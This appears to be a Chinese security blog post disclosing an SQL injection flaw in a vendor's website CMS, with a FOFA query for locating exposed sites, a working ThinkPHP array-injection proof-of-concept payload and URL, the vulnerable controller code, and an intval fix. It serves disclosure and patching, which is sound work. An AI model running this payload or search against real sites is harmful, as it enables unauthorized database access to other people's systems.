漏洞描述
北京金方时代科技有限公司建站系统存在SQL注入漏洞
影响版本
全版本
fofa语法
“金方时代内容管理系统”
漏洞复现
官网:https://www.bjjfsd.com/
Poc:
id[where]=1%20or%20updatexml(0,user(),0)
源代码分析:漏洞在
Application/Wap/Controller/IndexController.class.php中:
public function data_show($id = 0) {
if (empty($id)) {
$this->redirect('index');
}
$info = M('News')->find($id);
可以看到$id参数没有过滤直接代入find函数,框架为thinkphp3.2.3,所以使用[where]进行注入。
http://localhost/index.php?m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
Fofa:”金方时代内容管理系统”
案例:
临时解决方案 | $id=intval($id); |
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容